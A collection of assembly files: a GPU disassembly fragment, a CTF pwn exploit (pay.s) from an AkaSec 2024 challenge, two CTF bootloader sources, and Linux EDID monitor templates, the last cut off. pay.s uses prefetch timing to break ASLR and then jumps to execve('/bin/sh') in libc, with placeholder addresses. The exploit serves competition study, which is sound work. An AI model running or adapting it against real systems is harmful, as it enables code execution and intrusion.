/*0148*/ { IADD R22.CC, R24.reuse, c[0x0][0x140] ; /* 0x4c10800005071816 */
/*0150*/ LDG.E R10, [R26] }
/* 0xeed4200000071a0a */
/*0158*/ SHR.U32 R5, R4, 0x1e ; /* 0x3828000001e70405 */
/* 0x001fd400fe2207f1 */
/*0168*/ IADD.X R23, R9.reuse, c[0x0][0x144] ; /* 0x4c10080005170917 */
/*0170*/ IADD R24.CC, R24, c[0x0][0x148] ; /* 0x4c10800005271818 */
/*0178*/ IADD32I R4, R11, 0x4 ; /* 0x1c00000000470b04 */
/* 0x081fd440fe2007e1 */
/*0188*/ IADD.X R25, R9, c[0x0][0x14c] ; /* 0x4c10080005370919 */
/*0190*/ IADD R18.CC, R12.reuse, c[0x0][0x140] ; /* 0x4c10800005070c12 */
/*0198*/ SHL R9, R4.reuse, 0x2 ; /* 0x3848000000270409 */
/* 0x001fc000fe2007f1 */
/*01a8*/ IADD.X R19, R5, c[0x0][0x144] ; /* 0x4c10080005170513 */
/*01b0*/ IADD R12.CC, R12, c[0x0][0x148] ; /* 0x4c10800005270c0c */
/*01b8*/ { SHR.U32 R28, R4, 0x1e ; /* 0x3828000001e7041c */
/* 0x000ec800fe0002f5 */
/*01c8*/ LDG.E R4, [R24] }
/* 0xeed4200000071804 */
/*01d0*/ { IADD.X R13, R5, c[0x0][0x14c] ; /* 0x4c1008000537050d */
/*01d8*/ LDG.E R5, [R22] }
/* 0xeed4200000071605 */
/* 0x001f8400fec007f0 */
/*01e8*/ { IADD R14.CC, R9, c[0x0][0x148] ; /* 0x4c1080000527090e */
/*01f0*/ LDG.E R3, [R12] }
/* 0xeed4200000070c03 */
/*01f8*/ IADD.X R15, R28, c[0x0][0x14c] ; /* 0x4c10080005371c0f */
/* 0x001fc00016c00ff0 */
/*0208*/ { IADD R6.CC, R9, c[0x0][0x140] ; /* 0x4c10800005070906 */
/*0210*/ LDG.E R9, [R18] }
/* 0xeed4200000071209 */
/*0218*/ { IADD.X R7, R28, c[0x0][0x144] ; /* 0x4c10080005171c07 */
/* 0x0006d842fe0007f2 */
/*0228*/ LDG.E R2, [R14] }
/* 0xeed4200000070e02 */
/*0230*/ { IADD32I R26, R11.reuse, 0x5 ; /* 0x1c00000000570b1a */
/*0238*/ LDG.E R16, [R6] }
/* 0xeed4200000070610 */
/* 0x011ff400fe2227f1 */
/*0248*/ SHL R24, R26.reuse, 0x2 ; /* 0x3848000000271a18 */
/*0250*/ SHR.U32 R25, R26, 0x1e ; /* 0x3828000001e71a19 */
/*0258*/ IADD32I R22, R11, 0x6 ; /* 0x1c00000000670b16 */
/* 0x081fc441fea007e1 */
/*0268*/ IADD R26.CC, R24, c[0x0][0x140] ; /* 0x4c1080000507181a */
/*0270*/ SHL R19, R22.reuse, 0x2 ; /* 0x3848000000271613 */
/*0278*/ IADD.X R27, R25.reuse, c[0x0][0x144] ; /* 0x4c1008000517191b */
/* 0x001fd000fe2007f1 */
/*0288*/ IADD R12.CC, R24, c[0x0][0x148] ; /* 0x4c1080000527180c */
/*0290*/ SHR.U32 R22, R22, 0x1e ; /* 0x3828000001e71616 */
/*0298*/ IADD32I R18, R11, 0x7 ; /* 0x1c00000000770b12 */
/* 0x0003c442fe0007e2 */
/*02a8*/ IADD.X R13, R25, c[0x0][0x14c] ; /* 0x4c1008000537190d */
/*02b0*/ { IADD R6.CC, R19.reuse, c[0x0][0x140] ; /* 0x4c10800005071306 */
/*02b8*/ LDG.E R29, [R12] }
/* 0xeed4200000070c1d */
/* 0x001fc400fe2207f5 */
/*02c8*/ SHL R24, R18.reuse, 0x2 ; /* 0x3848000000271218 */
/*02d0*/ IADD.X R7, R22, c[0x0][0x144] ; /* 0x4c10080005171607 */
/*02d8*/ IADD R14.CC, R19, c[0x0][0x148] ; /* 0x4c1080000527130e */
/* 0x001fc400fc8007f1 */
/*02e8*/ SHR.U32 R18, R18, 0x1e ; /* 0x3828000001e71212 */
/*02f0*/ IADD32I R19, R11, 0x8 ; /* 0x1c00000000870b13 */
/*02f8*/ IADD.X R15, R22, c[0x0][0x14c] ; /* 0x4c1008000537160f */
/* 0x001fd840fe2207f6 */
/*0308*/ IADD R22.CC, R24.reuse, c[0x0][0x140] ; /* 0x4c10800005071816 */
/*0310*/ IADD.X R23, R18.reuse, c[0x0][0x144] ; /* 0x4c10080005171217 */
/*0318*/ IADD R24.CC, R24, c[0x0][0x148] ; /* 0x4c10800005271818 */
/* 0x001fc840fe0007f2 */
/*0328*/ IADD.X R25, R18, c[0x0][0x14c] ; /* 0x4c10080005371219 */
/*0330*/ { IADD32I R18, R11.reuse, 0x9 ; /* 0x1c00000000970b12 */
/*0338*/ LDG.E R25, [R24] }
/* 0xeed4200000071819 */
/* 0x001fcc00f66007f0 */
/*0348*/ { IADD32I R31, R11, 0xe ; /* 0x1c00000000e70b1f */
/*0350*/ LDG.E R24, [R22] }
/* 0xeed4200000071618 */
/*0358*/ DEPBAR.LE SB5, 0x5 ; /* 0xf0f0000034570000 */
/* 0x081fc400fe2007e6 */
/*0368*/ FADD R21, R20, R21 ; /* 0x5c58000001571415 */
/*0370*/ FADD R21, R21, R8 ; /* 0x5c58000000871515 */
/*0378*/ SHL R8, R19.reuse, 0x2 ; /* 0x3848000000271308 */
/* 0x001fd800fe6007f0 */
/*0388*/ { SHR.U32 R19, R19, 0x1e ; /* 0x3828000001e71313 */
/*0390*/ DEPBAR.LE SB5, 0x4 }
/* 0xf0f0000034470000 */
/*0398*/ FADD R10, R10, R17 ; /* 0x5c58000001170a0a */
/* 0x001fcc00fc2007f1 */
/*03a8*/ FADD R10, R21, R10 ; /* 0x5c58000000a7150a */
/*03b0*/ SHL R20, R18, 0x2 ; /* 0x3848000000271214 */
/*03b8*/ DEPBAR.LE SB5, 0x3 ; /* 0xf0f0000034370000 */
/* 0x001fc440fea007f1 */
/*03c8*/ FADD R5, R4, R5 ; /* 0x5c58000000570405 */
/*03d0*/ IADD R4.CC, R8.reuse, c[0x0][0x140] ; /* 0x4c10800005070804 */
/*03d8*/ FADD R17, R10, R5 ; /* 0x5c58000000570a11 */
/* 0x001fcc00fda007f1 */
/*03e8*/ IADD.X R5, R19, c[0x0][0x144] ; /* 0x4c10080005171305 */
/*03f0*/ IADD R8.CC, R8, c[0x0][0x148] ; /* 0x4c10800005270808 */
/*03f8*/ DEPBAR.LE SB5, 0x2 ; /* 0xf0f0000034270000 */
/* 0x001fc400fc2007f1 */
/*0408*/ LDG.E R22, [R4] ; /* 0xeed4200000070416 */
/*0410*/ FADD R3, R3, R9 ; /* 0x5c58000000970303 */
/*0418*/ SHR.U32 R10, R18, 0x1e ; /* 0x3828000001e7120a */
/* 0x001fc800fe0007f2 */
/*0428*/ IADD.X R9, R19, c[0x0][0x14c] ; /* 0x4c10080005371309 */
/*0430*/ { IADD R18.CC, R20, c[0x0][0x140] ; /* 0x4c10800005071412 */
/*0438*/ LDG.E R23, [R8] }
/* 0xeed4200000070817 */
/* 0x001fcc00ff4007f1 */
/*0448*/ FADD R17, R17, R3 ; /* 0x5c58000000371111 */
/*0450*/ IADD32I R3, R11, 0xa ; /* 0x1c00000000a70b03 */
/*0458*/ DEPBAR.LE SB5, 0x1 ; /* 0xf0f0000034170000 */
/* 0x001fc440fe2007e1 */
/*0468*/ FADD R16, R2, R16 ; /* 0x5c58000001070210 */
/*0470*/ IADD.X R19, R10.reuse, c[0x0][0x144] ; /* 0x4c10080005170a13 */
/*0478*/ IADD R20.CC, R20, c[0x0][0x148] ; /* 0x4c10800005271414 */
/* 0x001fc400fe2207f3 */
/*0488*/ SHL R2, R3.reuse, 0x2 ; /* 0x3848000000270302 */
/*0490*/ FADD R28, R17, R16 ; /* 0x5c5800000107111c */
/*0498*/ SHR.U32 R3, R3, 0x1e ; /* 0x3828000001e70303 */
/* 0x001fc000f64007f0 */
/*04a8*/ { IADD.X R21, R10, c[0x0][0x14c] ; /* 0x4c10080005370a15 */
/*04b0*/ LDG.E R10, [R26] }
/* 0xeed4200000071a0a */
/*04b8*/ { IADD32I R17, R11, 0xb ; /* 0x1c00000000b70b11 */
/* 0x0002d841fe0001f1 */
/*04c8*/ LDG.E R27, [R14] }
/* 0xeed4200000070e1b */
/*04d0*/ { IADD R12.CC, R2.reuse, c[0x0][0x140] ; /* 0x4c1080000507020c */
/*04d8*/ LDG.E R26, [R6] }
/* 0xeed420000007061a */
/* 0x001fc000fe4007f0 */
/*04e8*/ { IADD.X R13, R3, c[0x0][0x144] ; /* 0x4c1008000517030d */
/*04f0*/ LDG.E R21, [R20] }
/* 0xeed4200000071415 */
/*04f8*/ { IADD R2.CC, R2, c[0x0][0x148] ; /* 0x4c10800005270202 */
/* 0x001fc440fe0007b2 */
/*0508*/ LDG.E R20, [R18] }
/* 0xeed4200000071214 */
/*0510*/ { SHL R16, R17.reuse, 0x2 ; /* 0x3848000000271110 */
/*0518*/ LDG.E R18, [R12] }
/* 0xeed4200000070c12 */
/* 0x083fc000fe4017e3 */
/*0528*/ SHR.U32 R15, R17, 0x1e ; /* 0x3828000001e7110f */
/*0530*/ IADD.X R3, R3, c[0x0][0x14c] ; /* 0x4c10080005370303 */
/*0538*/ { IADD R6.CC, R16.reuse, c[0x0][0x140] ; /* 0x4c10800005071006 */
/* 0x001fc400fea000b1 */
/*0548*/ LDG.E R19, [R2] }
/* 0xeed4200000070213 */
/*0550*/ IADD32I R17, R11, 0xc ; /* 0x1c00000000c70b11 */
/*0558*/ IADD.X R7, R15, c[0x0][0x144] ; /* 0x4c10080005170f07 */
/* 0x001fd000fc2007f1 */
/*0568*/ IADD R16.CC, R16, c[0x0][0x148] ; /* 0x4c10800005271010 */
/*0570*/ SHL R14, R17, 0x2 ; /* 0x384800000027110e */
/*0578*/ SHR.U32 R9, R17, 0x1e ; /* 0x3828000001e71109 */
/* 0x001fc840fe0007f2 */
/*0588*/ IADD.X R17, R15, c[0x0][0x14c] ; /* 0x4c10080005370f11 */
/*0590*/ { IADD R4.CC, R14.reuse, c[0x0][0x140] ; /* 0x4c10800005070e04 */
/*0598*/ LDG.E R17, [R16] }
/* 0xeed4200000071011 */
/* 0x001fc400368007f0 */
/*05a8*/ { IADD32I R15, R11, 0xd ; /* 0x1c00000000d70b0f */
/*05b0*/ LDG.E R16, [R6] }
/* 0xeed4200000070610 */
/*05b8*/ IADD.X R5, R9, c[0x0][0x144] ; /* 0x4c10080005170905 */
/* 0x003fd040fe2007e1 */
/*05c8*/ IADD R14.CC, R14, c[0x0][0x148] ; /* 0x4c10800005270e0e */
/*05d0*/ SHL R8, R15.reuse, 0x2 ; /* 0x3848000000270f08 */
/*05d8*/ SHR.U32 R3, R15, 0x1e ; /* 0x3828000001e70f03 */
/* 0x001fc800fe0007f2 */
/*05e8*/ IADD.X R15, R9, c[0x0][0x14c] ; /* 0x4c1008000537090f */
/*05f0*/ { IADD R12.CC, R8, c[0x0][0x148] ; /* 0x4c1080000527080c */
/*05f8*/ LDG.E R15, [R14] }
/* 0xeed4200000070e0f */
/* 0x001f8800168007f0 */
/*0608*/ { SHL R2, R31, 0x2 ; /* 0x3848000000271f02 */
/*0610*/ LDG.E R14, [R4] }
/* 0xeed420000007040e */
/*0618*/ IADD.X R13, R3, c[0x0][0x14c] ; /* 0x4c1008000537030d */
/* 0x001fc800fec007f0 */
/*0628*/ { IADD R8.CC, R8, c[0x0][0x140] ; /* 0x4c10800005070808 */
/*0630*/ LDG.E R13, [R12] }
/* 0xeed4200000070c0d */
/*0638*/ IADD.X R9, R3, c[0x0][0x144] ; /* 0x4c10080005170309 */
/* 0x005fc400562007f0 */
/*0648*/ { SHR.U32 R3, R31, 0x1e ; /* 0x3828000001e71f03 */
/*0650*/ LDG.E R12, [R8] }
/* 0xeed420000007080c */
/*0658*/ IADD R6.CC, R2, c[0x0][0x148] ; /* 0x4c10800005270206 */
/* 0x001fc000fc400ff5 */
/*0668*/ IADD32I R4, R11, 0xf ; /* 0x1c00000000f70b04 */
/*0670*/ IADD.X R7, R3, c[0x0][0x14c] ; /* 0x4c10080005370307 */
/*0678*/ { IADD R2.CC, R2, c[0x0][0x140] ; /* 0x4c10800005070202 */
/* 0x001fc844fea007f1 */
/*0688*/ LDG.E R6, [R6] }
/* 0xeed4200000070606 */
/*0690*/ SHL R8, R4.reuse, 0x2 ; /* 0x3848000000270408 */
/*0698*/ IADD.X R3, R3, c[0x0][0x144] ; /* 0x4c10080005170303 */
/* 0x001fd800f62007f0 */
/*06a8*/ { SHR.U32 R31, R4, 0x1e ; /* 0x3828000001e7041f */
/*06b0*/ LDG.E R3, [R2] }
/* 0xeed4200000070203 */
/*06b8*/ IADD R4.CC, R8, c[0x0][0x148] ; /* 0x4c10800005270804 */
/* 0x001fd800fe0007e2 */
/*06c8*/ IADD.X R5, R31, c[0x0][0x14c] ; /* 0x4c10080005371f05 */
/*06d0*/ { IADD R8.CC, R8, c[0x0][0x140] ; /* 0x4c10800005070808 */
/*06d8*/ LDG.E R4, [R4] }
/* 0xeed4200000070404 */
/* 0x001fcc00f6a007f2 */
/*06e8*/ IADD.X R9, R31, c[0x0][0x144] ; /* 0x4c10080005171f09 */
/*06f0*/ LDG.E R9, [R8] ; /* 0xeed4200000070809 */
/*06f8*/ DEPBAR.LE SB5, 0x9 ; /* 0xf0f0000034970000 */
/* 0x001fc400fcc007f1 */
/*0708*/ FADD R24, R25, R24 ; /* 0x5c58000001871918 */
/*0710*/ IADD32I R30, R30, 0x10 ; /* 0x1c00000001071e1e */
/*0718*/ ISETP.NE.AND P0, PT, R30, RZ, PT ; /* 0x5b6b03800ff71e07 */
/* 0x001fc400fe6007ec */
/*0728*/ IADD32I R11, R11, 0x10 ; /* 0x1c00000001070b0b */
/*0730*/ DEPBAR.LE SB5, 0x7 ; /* 0xf0f0000034770000 */
/*0738*/ FADD R10, R29, R10 ; /* 0x5c58000000a71d0a */
/* 0x001f8400fec007f5 */
/*0748*/ FADD R27, R27, R26 ; /* 0x5c58000001a71b1b */
/*0750*/ FADD R10, R28, R10 ; /* 0x5c58000000a71c0a */
/*0758*/ FADD R10, R10, R27 ; /* 0x5c58000001b70a0a */
/* 0x001fcc00fe0007f5 */
/*0768*/ FADD R23, R23, R22 ; /* 0x5c58000001671717 */
/*0770*/ { FADD R10, R10, R24 ; /* 0x5c58000001870a0a */
/*0778*/ DEPBAR.LE SB5, 0x5 }
/* 0xf0f0000034570000 */
/* 0x001fd400fe2007f3 */
/*0788*/ FADD R20, R21, R20 ; /* 0x5c58000001471514 */
/*0790*/ FADD R10, R10, R23 ; /* 0x5c58000001770a0a */
/*0798*/ FADD R19, R19, R18 ; /* 0x5c58000001271313 */
/* 0x001f8c00fe6007f0 */
/*07a8*/ { FADD R10, R10, R20 ; /* 0x5c58000001470a0a */
/*07b0*/ DEPBAR.LE SB5, 0x4 }
/* 0xf0f0000034470000 */
/*07b8*/ FADD R16, R17, R16 ; /* 0x5c58000001071110 */
/* 0x001fcc00fe0007fd */
/*07c8*/ FADD R10, R10, R19 ; /* 0x5c58000001370a0a */
/*07d0*/ { FADD R10, R10, R16 ; /* 0x5c58000001070a0a */
/*07d8*/ DEPBAR.LE SB5, 0x3 }
/* 0xf0f0000034370000 */
/* 0x001fcc00fe0007fd */
/*07e8*/ FADD R15, R15, R14 ; /* 0x5c58000000e70f0f */
/*07f0*/ { FADD R10, R10, R15 ; /* 0x5c58000000f70a0a */
/*07f8*/ DEPBAR.LE SB5, 0x2 }
/* 0xf0f0000034270000 */
/* 0x001fcc00fe0007fd */
/*0808*/ FADD R12, R13, R12 ; /* 0x5c58000000c70d0c */
/*0810*/ { FADD R10, R10, R12 ; /* 0x5c58000000c70a0a */
/*0818*/ DEPBAR.LE SB5, 0x1 }
/* 0xf0f0000034170000 */
/* 0x041fd800fe2007e6 */
/*0828*/ FADD R3, R6, R3 ; /* 0x5c58000000370603 */
/*0830*/ FADD R3, R10, R3 ; /* 0x5c58000000370a03 */
/*0838*/ FADD R4, R4, R9 ; /* 0x5c58000000970404 */
/* 0x081fc400ffa007f0 */
/*0848*/ { FADD R8, R3, R4 ; /* 0x5c58000000470308 */
/*0850*/ @P0 BRA 0x60 }
/* 0xe2400fff8080000f */
/*0858*/ SHR R3, R0.reuse, 0x1e ; /* 0x3829000001e70003 */
/* 0x001fd400fc4007e6 */
/*0868*/ ISCADD R2.CC, R0, c[0x0][0x150], 0x2 ; /* 0x4c18810005470002 */
/*0870*/ IADD.X R3, R3, c[0x0][0x154] ; /* 0x4c10080005570303 */
/*0878*/ STG.E [R2], R8 ; /* 0xeedc200000070208 */
/* 0x001f8000ffe007ff */
/*0888*/ EXIT ; /* 0xe30000000007000f */
/*0890*/ BRA 0x890 ; /* 0xe2400fffff87000f */
/*0898*/ NOP; /* 0x50b0000000070f00 */
/* 0x001f8000fc0007e0 */
/*08a8*/ NOP; /* 0x50b0000000070f00 */
/*08b0*/ NOP; /* 0x50b0000000070f00 */
/*08b8*/ NOP; /* 0x50b0000000070f00 */
..........................
|
AkaSec-1337-CyberSecurity-Club/Akasec-CTF-2024
| 2,600
|
pwn/bad_trip_and_the_absolute_horror_of_the_trip/pay.s
|
global _start
; rsi ---> temporary storage [time bfr prefetching]
; rbx ---> temporary storage [time after prefetching]
; rax ---> used for division
; rdi ---> temporary storage
; r8 ---> address iterator
; r9 ---> temporary storage
; r11 ---> full addr
; r10 ---> the time that prefetch took
; r12 ---> average
; r13 ---> latest time stamp counter
; r15 ---> temporary storage
section .text
_start:
mov r8, 0x1000;
mov r12, 0;
mov r13, 1;
jmp _bruteforce;
_bruteforce :
mov rsp, 0xffffffff;
mov rbp, 0xffffffff; ; replace this with writable addr
cmp r8, 0xffff; ; simple loop
je _ok; ; once rdi equals 0xffff the exploit failed for some reason
mov r11, 0x69696969; ; replace with real partial leak
call _assemble_addr;
call _rdtscp;
mov rsi, rax; ; moving starting time
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
call _rdtscp;
mov rbx, rax; ; moving ending time
mov r10, rbx;
sub r10, rsi; ; adding to the average
add r12, r10; ; r10 in this case is the time stamp of prefetch
mov rax, r13; ; checking if the 30% latest time stamp is bigger than our time
; stamp, if yes that means that the addr is fetched from the cache
imul rax, rax, 30;
xor rdx, rdx;
mov rcx, 100;
div rcx;
cmp r10, rax; ; comparing the current ts with 30% latest ts if ths less we jump
; to code execution
jl _ok;
; well not this time, we need to check if the average of fetching
; operations is not that far from the latest time stamp, cause
; some times cpu needs to go on a cpu walk that takes time. this
; could interfere with our calculations
int3;
add r8, 1;
mov rcx, r8; ; r11 will be our index
sub rcx, 0x1000;
mov rax, r12;
xor rdx, rdx;
div rcx;
imul rax, rax, 2;
cmp rax, r10;
jl _bruteforce;
mov r13, r10;
jmp _bruteforce;
;; preforming checks
_assemble_addr : ;; r11 contains half add and rdi contains addr iter
mov rdi, r8;
sal rdi, 32;
or rdi, r11;
mov r11, rdi;
ret;
_rdtscp :
rdtscp;
shl rdx, 32;
or rax, rdx;
ret;
_ok : ; aslr broken ready to call sys from libc
mov rax, r11;
sub rax, 0xfffffff; ; replace this with libc puts addr
mov rdi, rax;
add rdi, 0xffffffff; ; replace this with /bin/sh addr
mov rsi, 0;
mov rdx, 0;
mov r8, rax;
add r8, 0xffffffffff; ; replace this with execve addr
jmp r8;
ret;
|
AkaSec-1337-CyberSecurity-Club/CyberOdyssey_2024_Qualifications
| 1,440
|
Pwn/burg/src/boot.s
|
bits 16:
section .boot;
global boot;
%define NULL_SEG 0
%define CODE_SEG 0x8
%define DATA_SEG 0x10
%define RCODE_SEG 0x18
%define RDATA_SEG 0x20
boot:
mov ah, 0x00; Function: Set video mode
mov al, 0x03; Mode: 80x25 text mode (mode 3 dzeb)
int 0x10; Call BIOS interrupt
call load_step1_5; loading the second step from the second sector
call load_gdt;
; pivoting to protected_mode
cli;
mov eax, cr0;
or eax, 1;
mov cr0, eax;
mov ax, DATA_SEG
jmp CODE_SEG:kload;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; GDT ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
gdt_data:
dd 0
dd 0
;gdt_code:
dw 0xFFFF
dw 0
db 0
db 10011010b
db 11001111b
db 0
;gdt_data:
dw 0xFFFF
dw 0
db 0
db 10010010b
db 11001111b
db 0
; rmode gdt
; gdt code
dw 0xFFFF
dw 0
db 0
db 0x9e
db 0
db 0
; gdt data:
dw 0xFFFF
dw 0
db 0
db 0x92
db 0
db 0
gdt_end:
gdt_ptr:
dw gdt_end - gdt_data - 1;
dd gdt_data
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
load_step1_5:
mov ah, 0x2;
mov al, 0x3; we just wanna read 2 sectors for now
mov cl, 0x2;
mov bx, 0x7e00;
int 0x13;
ret;
load_gdt:
cli;
pusha;
lgdt [gdt_ptr];
sti;
popa;
ret;
bits 32
kload:
mov ds, ax
mov ss, ax
mov es, ax
mov esp,kernel_stack_top;
pusha
extern main
call main
popa
jmp -2;
times 510 - ($-$$) db 0
dw 0xaa55
section .bss
align 4
kernel_stack_bottom: equ $
resb 16384 ; 16 KB
kernel_stack_top:
|
AkaSec-1337-CyberSecurity-Club/CyberOdyssey_2024_Qualifications
| 2,039
|
Pwn/burg/test/src/boot.s
|
bits 16:
section .boot;
global boot;
;org 0x7c00
%define NULL_SEG 0
%define CODE_SEG 0x8
%define DATA_SEG 0x10
%define RCODE_SEG 0x18
%define RDATA_SEG 0x20
boot:
mov ah, 0x00; Function: Set video mode
mov al, 0x03; Mode: 80x25 text mode (mode 3 dzeb)
int 0x10; Call BIOS interrupt
call load_step1_5; loading the second step from the second sector
call load_gdt;
; pivoting to protected_mode
cli;
mov eax, cr0;
or eax, 1;
mov cr0, eax;
mov ax, DATA_SEG
jmp CODE_SEG:kload;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; GDT ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
gdt_data:
dd 0
dd 0
;gdt_code:
dw 0xFFFF
dw 0
db 0
db 10011010b
db 11001111b
db 0
;gdt_data:
dw 0xFFFF
dw 0
db 0
db 10010010b
db 11001111b
db 0
; rmode gdt
; gdt code
dw 0xFFFF
dw 0
db 0
db 0x9e
db 0
db 0
; gdt data:
dw 0xFFFF
dw 0
db 0
db 0x92
db 0
db 0
gdt_end:
gdt_ptr:
dw gdt_end - gdt_data - 1;
dd gdt_data
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
print:
lodsb
or al, al
jz PrintReturn
mov ah, 0eh
int 10h
jmp print
PrintReturn:
ret
load_step1_5:
mov ah, 0x2;
mov al, 0x3; we just wanna read 2 sectors for now
mov cl, 0x2;
mov bx, 0x7e00;
int 0x13;
ret;
load_gdt:
cli;
pusha;
lgdt [gdt_ptr];
sti;
popa;
ret;
bits 32
kload:
mov ds, ax
mov ss, ax
mov es, ax
mov esp,kernel_stack_top;
pusha
extern main
call main
popa
; returning from c code
; delete me please
; returning to 16 bit mode
mov ax, RDATA_SEG
mov ds, ax
mov es, ax
mov ss, ax
mov sp, 0xFFFF
jmp RCODE_SEG:rmode_stub
bits 16
rmode_stub:
mov eax, cr0
and eax, 0xfffffffe
mov cr0, eax
jmp 0:prot_to_real
prot_to_real:
xor ax, ax
mov ds, ax
mov es, ax
mov ss, ax
sti
call load_flag;
mov si, 0x7d00;
call print;
jmp -2;
load_flag:
mov ah, 0x2;
mov al, 0x1;
mov cl, 0x5;
mov bx, 0x7d00;
int 0x13;
ret;
msg: db "hello world", 0x0;
times 510 - ($-$$) db 0
dw 0xaa55
section .bss
align 4
kernel_stack_bottom: equ $
resb 16384 ; 16 KB
kernel_stack_top:
|
akatrevorjay/edid-generator
| 1,292
|
1680x1050.S
|
/*
1680x1050.S: EDID data set for standard 1680x1050 60 Hz monitor
Copyright (C) 2012 Carsten Emde <C.Emde@osadl.org>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*/
/* EDID */
#define VERSION 1
#define REVISION 3
/* Display */
#define CLOCK 146250 /* kHz */
#define XPIX 1680
#define YPIX 1050
#define XY_RATIO XY_RATIO_16_10
#define XBLANK 560
#define YBLANK 39
#define XOFFSET 104
#define XPULSE 176
#define YOFFSET (63+3)
#define YPULSE (63+6)
#define DPI 96
#define VFREQ 60 /* Hz */
#define TIMING_NAME "Linux WSXGA"
/* No ESTABLISHED_TIMINGx_BITS */
#define HSYNC_POL 1
#define VSYNC_POL 1
#include "edid.S"
|
akatrevorjay/edid-generator
| 1,138
|
800x600.S
|
/*
800x600.S: EDID data set for standard 800x600 60 Hz monitor
Copyright (C) 2011 Carsten Emde <C.Emde@osadl.org>
Copyright (C) 2014 Linaro Limited
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
*/
/* EDID */
#define VERSION 1
#define REVISION 3
/* Display */
#define CLOCK 40000 /* kHz */
#define XPIX 800
#define YPIX 600
#define XY_RATIO XY_RATIO_4_3
#define XBLANK 256
#define YBLANK 28
#define XOFFSET 40
#define XPULSE 128
#define YOFFSET (63+1)
#define YPULSE (63+4)
#define DPI 72
#define VFREQ 60 /* Hz */
#define TIMING_NAME "Linux SVGA"
#define ESTABLISHED_TIMING1_BITS 0x01 /* Bit 0: 800x600 @ 60Hz */
#define HSYNC_POL 1
#define VSYNC_POL 1
#include "edid.S"
|
akatrevorjay/edid-generator
| 1,288
|
1600x1200.S
|
/*
1600x1200.S: EDID data set for standard 1600x1200 60 Hz monitor
Copyright (C) 2013 Carsten Emde <C.Emde@osadl.org>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*/
/* EDID */
#define VERSION 1
#define REVISION 3
/* Display */
#define CLOCK 162000 /* kHz */
#define XPIX 1600
#define YPIX 1200
#define XY_RATIO XY_RATIO_4_3
#define XBLANK 560
#define YBLANK 50
#define XOFFSET 64
#define XPULSE 192
#define YOFFSET (63+1)
#define YPULSE (63+3)
#define DPI 72
#define VFREQ 60 /* Hz */
#define TIMING_NAME "Linux UXGA"
/* No ESTABLISHED_TIMINGx_BITS */
#define HSYNC_POL 1
#define VSYNC_POL 1
#include "edid.S"
|
akatrevorjay/edid-generator
| 1,288
|
1280x1024.S
|
/*
1280x1024.S: EDID data set for standard 1280x1024 60 Hz monitor
Copyright (C) 2011 Carsten Emde <C.Emde@osadl.org>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*/
/* EDID */
#define VERSION 1
#define REVISION 3
/* Display */
#define CLOCK 108000 /* kHz */
#define XPIX 1280
#define YPIX 1024
#define XY_RATIO XY_RATIO_5_4
#define XBLANK 408
#define YBLANK 42
#define XOFFSET 48
#define XPULSE 112
#define YOFFSET (63+1)
#define YPULSE (63+3)
#define DPI 72
#define VFREQ 60 /* Hz */
#define TIMING_NAME "Linux SXGA"
/* No ESTABLISHED_TIMINGx_BITS */
#define HSYNC_POL 1
#define VSYNC_POL 1
#include "edid.S"
|
akatrevorjay/edid-generator
| 9,709
|
edid.S
|
/*
edid.S: EDID data template
Copyright (C) 2012 Carsten Emde <C.Emde@osadl.org>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*/
/* Manufacturer */
#define MFG_LNX1 'L'
#define MFG_LNX2 'N'
#define MFG_LNX3 'X'
#define SERIAL 0
#define YEAR 2012
